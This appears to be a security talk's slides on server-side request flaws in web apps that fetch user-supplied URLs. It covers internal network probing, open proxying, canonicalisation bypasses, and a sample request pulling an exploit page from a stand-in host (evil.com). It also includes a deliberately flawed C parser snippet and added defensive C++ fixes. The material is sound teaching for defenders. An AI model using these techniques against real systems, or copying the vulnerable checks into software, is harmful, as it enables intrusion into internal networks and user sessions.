Emerging Threats in Distributed
Applications (Web 2.0)
Waqas Nazir
Managing Security Consultant, Digital Security
Overview
• Rich features in applications
– Hosting RSS Feeds
– Hosting 3rd party content on pages
– Single Sign On
– Data Manipulation (Translation Services, Redesigning)
• Design and implementation flaws
• Threat to end users and hosting networks
Background
• Code Excerpts
– Java Code: WebRequest wbReq = new GetMethodWebRequest(Userstring);
– C++ Code: WebRequest* myReq = WebRequest::Create(UserURLObject);
– .NET Code: HttpWebRequest wbRequest = (HttpWebRequest)WebRequest.Create(Userstring);
Background (Continued)
• An application will have code like this for two main reasons:
1. It wants to operate independently of the data sources
2. It wants to give the user the ability to select where the data comes from
Visual Representation
[Diagram: End User Bob asks www.foonet.com to host BBC News (news.bbc.com) on a page; foonet.com fetches news.bbc.com and sends back the content requested.]
Issues
• Design Issues
• Implementation Issues
• Potential Solutions
Information Disclosure
[Diagram: End User Bob asks www.foonet.com to host an internal page from the DMZ or private network; foonet.com fetches it and sends back the content requested. Nodes shown: End User Bob, www.foonet.com, news.bbc.com, DMZ or private network.]
Information Disclosure
• Ability to request internal pages from the DMZ
and intranet
• Explicit routes to core network
• Privilege escalation
• Mount attacks on all RFC 1918 IP Space
• 10.0.0.0 - 10.255.255.255 (10/8 prefix)
• 172.16.0.0 - 172.31.255.255 (172.16/12 prefix)
• 192.168.0.0 - 192.168.255.255 (192.168/16 prefix)
Open Application Proxies
• Channel attacks to other sites and applications
• Used to bypass restrictions on sites, thanks to the indirection
• Traffic manipulation
• ldap://, telnet://, file://, mailto://, etc
• Sending Traffic to specific ports to exploit known
vulnerabilities in services
Implementation Issues
• Third party content is typically hosted in "throw away domains"
• These domains sometimes map to the same IP addresses
• Example: Google uses an IP address to host third party content. An nslookup on that IP address shows the host name is google.com.
• Some applications use different domain names to host third party content
Implementation Issues
• Application logic is used to check whether a page being requested should be loaded in the trusted domain or the untrusted domain.
– if (hostname == trusted && page == untrusted) {
      redirect to throw away domain
  }
– Canonicalization can be used to bypass this logic. The hostname could have a trailing dot ".".
» Example: www.trusted.com. (an FQDN, or absolute DNS name). Servers will pass this string through as the hostname, and the comparison fails because www.trusted.com. != www.trusted.com, so the redirect is skipped.
» Example: similarly, adding a trailing forward slash followed by another page name. IIS will route the request to the right page, but the page == untrusted comparison returns false because of the appended page: http://www.trusted.com/untrusted.aspx/trusted.aspx
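An added example, not code from the presentation, written in C++ to show the routing check above as literally written beside a version that compares canonical forms. The trusted host www.trusted.com, the page untrusted.aspx and the function names are assumptions of this example.

```cpp
#include <algorithm>
#include <cctype>
#include <string>

static std::string lower(std::string s) {
    std::transform(s.begin(), s.end(), s.begin(),
                   [](unsigned char c) { return std::tolower(c); });
    return s;
}

// The slide's routing check as literally written: exact host compare and
// exact page compare. Both halves can be defeated without changing the
// page the server actually executes.
bool naive_needs_redirect(const std::string& host, const std::string& path) {
    return host == "www.trusted.com" && path == "/untrusted.aspx";
}

// Host canonicalisation: case-fold and drop the trailing dot of an absolute
// DNS name, so "WWW.Trusted.COM." compares equal to "www.trusted.com".
static std::string canonical_host(std::string host) {
    host = lower(host);
    if (!host.empty() && host.back() == '.') host.pop_back();
    return host;
}

// Page canonicalisation: the first path segment carrying an extension is the
// handler the server runs; anything after it is extra path info, so
// "/untrusted.aspx/trusted.aspx" is still untrusted.aspx.
static std::string canonical_page(const std::string& path) {
    const std::string p = lower(path);
    size_t pos = 0;
    while (pos <= p.size()) {
        const size_t next = p.find('/', pos);
        const std::string seg =
            p.substr(pos, next == std::string::npos ? std::string::npos : next - pos);
        if (seg.find('.') != std::string::npos) return seg;
        if (next == std::string::npos) break;
        pos = next + 1;
    }
    return p;  // no extension anywhere: compare the whole path
}

// Hardened check: compare canonical forms, never the raw user-supplied strings.
bool hardened_needs_redirect(const std::string& host, const std::string& path) {
    return canonical_host(host) == "www.trusted.com"
        && canonical_page(path) == "untrusted.aspx";
}
```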
Implementation Issues
• Bypassing the throw away domain logic results in compromising the sessions of end users.
• This could have a greater impact with SSO.
Summary
• Open application proxy
• Information Disclosure
• Compromise End User Sessions
• Compromise the Network Hosting such an application
Additional Attacks
• Attacking databases
– Almost all major database servers support a web interface
» SQL Server
» MySQL
• SELECT, DESCRIBE, JOIN, SHOW, DROP, CREATE and USE, and advanced query options such as LIMIT, DISTINCT and GROUP
• If anything on the backend of the web server exposes a web interface, it can be queried, since the front end has permissions to reach it.
Additional Attacks
• Request big chunks of data to cause Denial of Service
• Performance degradation
Additional Attacks
[Diagram: the end user's browser asks www.foonet.com to host content from www.evil.com; foonet.com (in front of the DMZ or private network) requests the content from evil.com and sends it back to the browser.]
Additional Attacks
  GET http://Evil.com/Exploit.html HTTP/1.1
  Accept: */*
  Accept-Language: en-us
  UA-CPU: x86
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.2; MS-RTC LM 8; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
  Host: evil.com
  Proxy-Connection: Keep-Alive
  Pragma: no-cache
  Authorization: Basic VVNFUkZPTzpCQVI=
Additional Attacks
• Native code is used to parse and manipulate third party content. Translation services in particular use C and C++ code for performance reasons.
– Malformed HTML documents can lead to native memory bugs.
– Stack Overflows, Heap Overflows, Integer Overflows, etc…
– Instead of using built-in APIs, code similar to the HTML parsing engines of browsers is written.
» Example:
  int scan_attrs(const char *str) {  /* enclosing function assumed; the slide shows only the body */
      char *sc;
      sc = strchr(str, '=');
      while (sc != NULL) {
          sc = strchr(sc - 1, ' ');  /* Integer overflow: sc - 1 steps before the start of str when '='
                                        is its first byte, and a run of spaces walks it further back,
                                        so the scan reads outside the buffer */
          …
      }
      return 0;
  }
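As an added example, not from the presentation, the same attribute scan written against a length-delimited buffer so that malformed input cannot move the scan before the start or past the end of the buffer. The function names and the tag-body input format are assumptions of this example.

```cpp
#include <cstddef>
#include <cstring>
#include <string>
#include <vector>

// Bounded replacement for strchr: searches [begin, end) only and returns
// end if the byte is absent. No pointer outside the buffer is ever formed.
static const char* find_in(const char* begin, const char* end, char ch) {
    if (begin >= end) return end;
    const void* hit = std::memchr(begin, ch, static_cast<size_t>(end - begin));
    return hit ? static_cast<const char*>(hit) : end;
}

// Collect attribute names ("href", "title") from a tag body such as
// "href=x title=y". Works on a length-delimited buffer, so a missing NUL,
// a leading '=' or a run of spaces before '=' cannot push the scan before
// buf or past buf + len, which is the failure mode of strchr(sc - 1, ' ').
std::vector<std::string> attribute_names(const char* buf, size_t len) {
    std::vector<std::string> names;
    const char* const end = buf + len;
    const char* cur = buf;
    while (cur < end) {
        const char* eq = find_in(cur, end, '=');
        if (eq == end) break;
        // The name is the run of non-space bytes immediately before '=';
        // walking back stops at cur, which is never before buf.
        const char* start = eq;
        while (start > cur && start[-1] != ' ') --start;
        if (start < eq) names.emplace_back(start, eq);
        // Skip the value (up to the next space) and continue forward only.
        cur = find_in(eq + 1, end, ' ');
    }
    return names;
}
```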
Potential Solutions
[Diagram: as in the visual representation, the end user's browser asks www.foonet.com to host BBC News from news.bbc.com; foonet.com sits in front of the DMZ or private network and sends back the content requested.]
Potential Solutions
• Validate the user controlled parameter before creating a new request for the protocol
• Disallow all internal requests
• Ensure that the throw away domain logic cannot be circumvented due to canonicalization issues and implementation flaws
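An added example, not code from the presentation, of the first two solutions in C++: a gate applied to the user-controlled URL before any WebRequest.Create-style call, allowing only http and https and refusing the RFC 1918 ranges listed earlier plus loopback and link-local addresses. The function names and the decision to reject userinfo, IPv6 literals and single-label host names outright are assumptions of this example.

```cpp
#include <algorithm>
#include <cctype>
#include <cstdint>
#include <cstdio>
#include <string>

static std::string lower(std::string s) {
    std::transform(s.begin(), s.end(), s.begin(),
                   [](unsigned char c) { return std::tolower(c); });
    return s;
}

// Parse a dotted-quad IPv4 literal into host order; false if `host` is not one.
bool parse_ipv4(const std::string& host, uint32_t& out) {
    for (char c : host)
        if (!std::isdigit(static_cast<unsigned char>(c)) && c != '.') return false;
    unsigned a, b, c, d; char extra;
    if (std::sscanf(host.c_str(), "%u.%u.%u.%u%c", &a, &b, &c, &d, &extra) != 4) return false;
    if (a > 255 || b > 255 || c > 255 || d > 255) return false;
    out = (a << 24) | (b << 16) | (c << 8) | d;
    return true;
}

// RFC 1918 space plus loopback, link-local and 0/8: never fetched on a user's behalf.
bool is_internal_ipv4(uint32_t ip) {
    auto in = [ip](uint32_t net, int bits) { return (ip >> (32 - bits)) == (net >> (32 - bits)); };
    return in(0x0A000000, 8) || in(0xAC100000, 12) || in(0xC0A80000, 16)
        || in(0x7F000000, 8) || in(0xA9FE0000, 16) || in(0x00000000, 8);
}

// Gate for the user-controlled URL before the outbound request is created.
bool allowed_target(const std::string& url) {
    const size_t p = url.find("://");
    if (p == std::string::npos) return false;
    const std::string scheme = lower(url.substr(0, p));
    if (scheme != "http" && scheme != "https") return false;  // rejects ldap://, file://, telnet://, mailto://
    const size_t start = p + 3;
    const size_t slash = url.find('/', start);
    const std::string auth = url.substr(start, slash == std::string::npos ? std::string::npos : slash - start);
    // Userinfo and IPv6 literals are refused rather than parsed (assumption of this example).
    if (auth.empty() || auth.find('@') != std::string::npos || auth.find('[') != std::string::npos) return false;
    std::string host = lower(auth.substr(0, auth.find(':')));
    if (!host.empty() && host.back() == '.') host.pop_back();  // www.trusted.com. -> www.trusted.com
    if (host.empty() || host == "localhost" || host.find('.') == std::string::npos) return false;
    uint32_t ip;
    if (parse_ipv4(host, ip)) return !is_internal_ipv4(ip);
    // A host name is only provisionally allowed: the caller must resolve it and run the
    // resolved address through is_internal_ipv4 too, since DNS can point a public name inward.
    return true;
}
```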